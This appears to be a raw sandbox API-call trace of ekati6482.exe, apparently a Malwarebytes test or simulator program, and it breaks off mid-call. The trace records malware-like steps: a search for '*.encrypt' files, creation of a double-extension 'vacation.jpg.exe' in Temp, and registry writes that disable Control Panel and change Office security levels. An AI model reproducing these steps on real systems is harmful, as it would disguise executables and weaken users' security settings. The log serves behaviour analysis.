# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Feb 18 2020 07:49:07 # Log Creation Date: 27.02.2020 09:41:00.642 Process: id = "1" image_name = "ekati6482.exe" filename = "c:\\users\\fd1hvy\\desktop\\ekati6482.exe" page_root = "0x9c6e000" os_pid = "0x1224" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x9dc" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\ekati6482.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x123c [0135.363] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0136.266] RoInitialize () returned 0x1 [0136.270] RoUninitialize () returned 0x0 [0154.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fe458 | out: phkResult=0x12fe458*=0x0) returned 0x2 [0154.496] RegCloseKey (hKey=0x80000002) returned 0x0 [0154.586] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0154.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb78) returned 1 [0154.594] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12febf4 | out: lpFileInformation=0x12febf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb74) returned 1 [0154.609] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0154.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fead8) returned 1 [0154.611] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xe4 [0154.759] GetFileType (hFile=0xe4) returned 0x1 [0154.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fead4) returned 1 [0154.760] GetFileType (hFile=0xe4) returned 0x1 [0154.765] GetTimeZoneInformation (in: lpTimeZoneInformation=0x12fea3c | out: lpTimeZoneInformation=0x12fea3c) returned 0x1 [0154.775] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x12fe898 | out: pTimeZoneInformation=0x12fe898) returned 0x1 [0154.795] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fe97c | out: phkResult=0x12fe97c*=0x2c4) returned 0x0 [0154.797] RegQueryValueExW (in: hKey=0x2c4, lpValueName="TZI", lpReserved=0x0, lpType=0x12fe998, lpData=0x0, lpcbData=0x12fe994*=0x0 | out: lpType=0x12fe998*=0x3, lpData=0x0, lpcbData=0x12fe994*=0x2c) returned 0x0 [0154.798] RegQueryValueExW (in: hKey=0x2c4, lpValueName="TZI", lpReserved=0x0, lpType=0x12fe998, lpData=0x310783c, lpcbData=0x12fe994*=0x2c | out: lpType=0x12fe998*=0x3, lpData=0x310783c*, lpcbData=0x12fe994*=0x2c) returned 0x0 [0154.873] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fe7d0 | out: phkResult=0x12fe7d0*=0x0) returned 0x2 [0154.875] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x12fe970, lpData=0x0, lpcbData=0x12fe96c*=0x0 | out: lpType=0x12fe970*=0x1, lpData=0x0, lpcbData=0x12fe96c*=0x20) returned 0x0 [0154.876] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x12fe970, lpData=0x3107d48, lpcbData=0x12fe96c*=0x20 | out: lpType=0x12fe970*=0x1, lpData="@tzres.dll,-320", lpcbData=0x12fe96c*=0x20) returned 0x0 [0154.876] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x12fe970, lpData=0x0, lpcbData=0x12fe96c*=0x0 | out: lpType=0x12fe970*=0x1, lpData=0x0, lpcbData=0x12fe96c*=0x20) returned 0x0 [0154.876] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x12fe970, lpData=0x3107da0, lpcbData=0x12fe96c*=0x20 | out: lpType=0x12fe970*=0x1, lpData="@tzres.dll,-322", lpcbData=0x12fe96c*=0x20) returned 0x0 [0154.876] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x12fe970, lpData=0x0, lpcbData=0x12fe96c*=0x0 | out: lpType=0x12fe970*=0x1, lpData=0x0, lpcbData=0x12fe96c*=0x20) returned 0x0 [0154.876] RegQueryValueExW (in: hKey=0x2c4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x12fe970, lpData=0x3107df8, lpcbData=0x12fe96c*=0x20 | out: lpType=0x12fe970*=0x1, lpData="@tzres.dll,-321", lpcbData=0x12fe96c*=0x20) returned 0x0 [0156.857] CoTaskMemAlloc (cb=0x20c) returned 0x15a23e0 [0156.857] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x15a23e0 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0156.870] CoTaskMemFree (pv=0x15a23e0) [0156.871] CoTaskMemAlloc (cb=0x20c) returned 0x15a23e0 [0156.871] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x12fe98c, pwszFileMUIPath=0x15a23e0, pcchFileMUIPath=0x12fe990, pululEnumerator=0x12fe984 | out: pwszLanguage=0x0, pcchLanguage=0x12fe98c, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x12fe990, pululEnumerator=0x12fe984) returned 1 [0156.969] CoTaskMemFree (pv=0x0) [0156.969] CoTaskMemFree (pv=0x15a23e0) [0156.970] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x30b0001 [0157.126] CoTaskMemAlloc (cb=0x3ec) returned 0x15cc080 [0157.126] LoadStringW (in: hInstance=0x30b0001, uID=0x140, lpBuffer=0x15cc080, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0157.127] CoTaskMemFree (pv=0x15cc080) [0157.127] FreeLibrary (hLibModule=0x30b0001) returned 1 [0157.129] CoTaskMemAlloc (cb=0x20c) returned 0x15cc080 [0157.129] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x15cc080 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0157.129] CoTaskMemFree (pv=0x15cc080) [0157.129] CoTaskMemAlloc (cb=0x20c) returned 0x15cc080 [0157.129] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x12fe98c, pwszFileMUIPath=0x15cc080, pcchFileMUIPath=0x12fe990, pululEnumerator=0x12fe984 | out: pwszLanguage=0x0, pcchLanguage=0x12fe98c, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x12fe990, pululEnumerator=0x12fe984) returned 1 [0157.130] CoTaskMemFree (pv=0x0) [0157.130] CoTaskMemFree (pv=0x15cc080) [0157.130] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x30b0001 [0157.131] CoTaskMemAlloc (cb=0x3ec) returned 0x15cc080 [0157.132] LoadStringW (in: hInstance=0x30b0001, uID=0x142, lpBuffer=0x15cc080, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0157.132] CoTaskMemFree (pv=0x15cc080) [0157.132] FreeLibrary (hLibModule=0x30b0001) returned 1 [0157.133] CoTaskMemAlloc (cb=0x20c) returned 0x15cc080 [0157.133] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x15cc080 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0157.134] CoTaskMemFree (pv=0x15cc080) [0157.134] CoTaskMemAlloc (cb=0x20c) returned 0x15cc080 [0157.134] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x12fe98c, pwszFileMUIPath=0x15cc080, pcchFileMUIPath=0x12fe990, pululEnumerator=0x12fe984 | out: pwszLanguage=0x0, pcchLanguage=0x12fe98c, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x12fe990, pululEnumerator=0x12fe984) returned 1 [0157.135] CoTaskMemFree (pv=0x0) [0157.135] CoTaskMemFree (pv=0x15cc080) [0157.135] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x30b0001 [0157.136] CoTaskMemAlloc (cb=0x3ec) returned 0x15cc080 [0157.136] LoadStringW (in: hInstance=0x30b0001, uID=0x141, lpBuffer=0x15cc080, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0157.136] CoTaskMemFree (pv=0x15cc080) [0157.136] FreeLibrary (hLibModule=0x30b0001) returned 1 [0157.138] RegCloseKey (hKey=0x2c4) returned 0x0 [0157.440] WriteFile (in: hFile=0xe4, lpBuffer=0x310ebd0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12feb7c, lpOverlapped=0x0 | out: lpBuffer=0x310ebd0*, lpNumberOfBytesWritten=0x12feb7c*=0x32, lpOverlapped=0x0) returned 1 [0158.101] CloseHandle (hObject=0xe4) returned 1 [0158.181] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0158.191] CoTaskMemAlloc (cb=0x20c) returned 0x15cc080 [0158.191] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x15cc080 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0158.199] CoTaskMemFree (pv=0x15cc080) [0158.199] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x105, lpBuffer=0x12fe6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0158.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fec80) returned 1 [0158.208] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Documents", nBufferLength=0x105, lpBuffer=0x12fe734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Documents", lpFilePart=0x0) returned 0x21 [0158.322] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Documents\\*.encrypt", lpFindFileData=0x12fe9a8 | out: lpFindFileData=0x12fe9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0158.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fec44) returned 1 [0158.873] EtwEventRegister (in: ProviderId=0x3112530, EnableCallback=0x59205be, CallbackContext=0x0, RegHandle=0x311250c | out: RegHandle=0x311250c) returned 0x0 [0159.199] CoCreateGuid (in: pguid=0x12fe52c | out: pguid=0x12fe52c*(Data1=0xda9f6dc8, Data2=0xa7db, Data3=0x4a1b, Data4=([0]=0x98, [1]=0x5d, [2]=0x43, [3]=0xf6, [4]=0xc1, [5]=0xe5, [6]=0x8f, [7]=0x63))) returned 0x0 [0160.867] CoTaskMemAlloc (cb=0x20c) returned 0x15d5880 [0160.867] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x15d5880 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0160.868] CoTaskMemFree (pv=0x15d5880) [0160.868] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x12fe720, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0160.868] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\vacation.jpg.exe", nBufferLength=0x105, lpBuffer=0x12fe644, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\vacation.jpg.exe", lpFilePart=0x0) returned 0x33 [0160.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb88) returned 1 [0160.869] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\vacation.jpg.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\vacation.jpg.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x430 [0160.874] GetFileType (hFile=0x430) returned 0x1 [0160.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb84) returned 1 [0160.874] GetFileType (hFile=0x430) returned 0x1 [0160.876] WriteFile (in: hFile=0x430, lpBuffer=0x3117abc*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x12febc4, lpOverlapped=0x0 | out: lpBuffer=0x3117abc*, lpNumberOfBytesWritten=0x12febc4*=0x17, lpOverlapped=0x0) returned 1 [0160.879] CloseHandle (hObject=0x430) returned 1 [0161.087] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe67c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0161.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb30) returned 1 [0161.087] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12febac | out: lpFileInformation=0x12febac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6296435b, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x32)) returned 1 [0161.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb2c) returned 1 [0161.088] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe67c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0161.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb7c) returned 1 [0161.088] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x3125b50 | out: lpFileInformation=0x3125b50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x6296435b, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x32)) returned 1 [0161.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb78) returned 1 [0161.089] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe55c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0161.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feaa0) returned 1 [0161.089] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x430 [0161.089] GetFileType (hFile=0x430) returned 0x1 [0161.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fea9c) returned 1 [0161.090] GetFileType (hFile=0x430) returned 0x1 [0161.090] SetFilePointer (in: hFile=0x430, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fea74*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fea74*=0) returned 0x32 [0161.092] WriteFile (in: hFile=0x430, lpBuffer=0x3127340*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x12feb30, lpOverlapped=0x0 | out: lpBuffer=0x3127340*, lpNumberOfBytesWritten=0x12feb30*=0x60, lpOverlapped=0x0) returned 1 [0161.092] CloseHandle (hObject=0x430) returned 1 [0162.589] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Excel\\Security", ulOptions=0x0, samDesired=0x2001f, phkResult=0x12febdc | out: phkResult=0x12febdc*=0x0) returned 0x2 [0162.590] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Excel\\Security", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x12febd8, lpdwDisposition=0x12fec4c | out: phkResult=0x12febd8*=0x428, lpdwDisposition=0x12fec4c*=0x1) returned 0x0 [0162.596] RegQueryValueExW (in: hKey=0x428, lpValueName="NoControlPanel", lpReserved=0x0, lpType=0x12fec0c, lpData=0x0, lpcbData=0x12fec08*=0x0 | out: lpType=0x12fec0c*=0x0, lpData=0x0, lpcbData=0x12fec08*=0x0) returned 0x2 [0162.597] RegSetValueExW (in: hKey=0x428, lpValueName="NoControlPanel", Reserved=0x0, dwType=0x1, lpData="1", cbData=0x4 | out: lpData="1") returned 0x0 [0162.598] RegCloseKey (hKey=0x428) returned 0x0 [0162.599] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0165.375] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0165.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb18) returned 1 [0165.376] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12feb94 | out: lpFileInformation=0x12feb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x645da453, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x92)) returned 1 [0165.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb14) returned 1 [0165.380] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0165.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb64) returned 1 [0165.380] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x312f4e0 | out: lpFileInformation=0x312f4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x645da453, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x92)) returned 1 [0165.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb60) returned 1 [0165.381] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0165.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fea88) returned 1 [0165.382] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x428 [0165.383] GetFileType (hFile=0x428) returned 0x1 [0165.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fea84) returned 1 [0165.383] GetFileType (hFile=0x428) returned 0x1 [0165.383] SetFilePointer (in: hFile=0x428, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fea5c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fea5c*=0) returned 0x92 [0165.385] WriteFile (in: hFile=0x428, lpBuffer=0x3130d0c*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0x12feb18, lpOverlapped=0x0 | out: lpBuffer=0x3130d0c*, lpNumberOfBytesWritten=0x12feb18*=0x6f, lpOverlapped=0x0) returned 1 [0165.388] CloseHandle (hObject=0x428) returned 1 [0165.656] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Excel\\Security", ulOptions=0x0, samDesired=0x2001f, phkResult=0x12febdc | out: phkResult=0x12febdc*=0x428) returned 0x0 [0165.657] RegQueryValueExW (in: hKey=0x428, lpValueName="Level", lpReserved=0x0, lpType=0x12fec0c, lpData=0x0, lpcbData=0x12fec08*=0x0 | out: lpType=0x12fec0c*=0x0, lpData=0x0, lpcbData=0x12fec08*=0x0) returned 0x2 [0165.657] RegSetValueExW (in: hKey=0x428, lpValueName="Level", Reserved=0x0, dwType=0x1, lpData="1", cbData=0x4 | out: lpData="1") returned 0x0 [0165.658] RegCloseKey (hKey=0x428) returned 0x0 [0165.658] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0168.523] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0168.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb18) returned 1 [0168.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x12feb94 | out: lpFileInformation=0x12feb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x66ee976f, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x101)) returned 1 [0168.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb14) returned 1 [0168.524] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe664, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0168.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12feb64) returned 1 [0168.524] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x313214c | out: lpFileInformation=0x313214c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x66ee976f, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x101)) returned 1 [0168.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12feb60) returned 1 [0168.525] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x12fe544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0168.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12fea88) returned 1 [0168.525] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x428 [0168.525] GetFileType (hFile=0x428) returned 0x1 [0168.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12fea84) returned 1 [0168.525] GetFileType (hFile=0x428) returned 0x1 [0168.526] SetFilePointer (in: hFile=0x428, lDistanceToMove=0, lpDistanceToMoveHigh=0x12fea5c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12fea5c*=0) returned 0x101 [0168.527] WriteFile (in: hFile=0x428, lpBuffer=0x3133954*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x12feb18, lpOverlapped=0x0 | out: lpBuffer=0x3133954*, lpNumberOfBytesWritten=0x12feb18*=0x66, lpOverlapped=0x0) returned 1 [0168.527] CloseHandle (hObject=0x428) returned 1 [0168.836] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Word\\Security", ulOptions=0x0, samDesired=0x2001f, phkResult=0x12febdc | out: phkResult=0x12febdc*=0x0) returned 0x2 [0168.837] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Malwarebytes\\Ekati\\Word\\Security", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x12febd8, lpdwDisposition=0x12fec4c | out: phkResult=0x12febd8*=0x428, lpdwDisposition=0x12fec4c*=0x1) returned 0x0 [0168.838] RegQueryValueExW (in: hKey=0x428, lpValueName="Level", lpReserved=0x0, 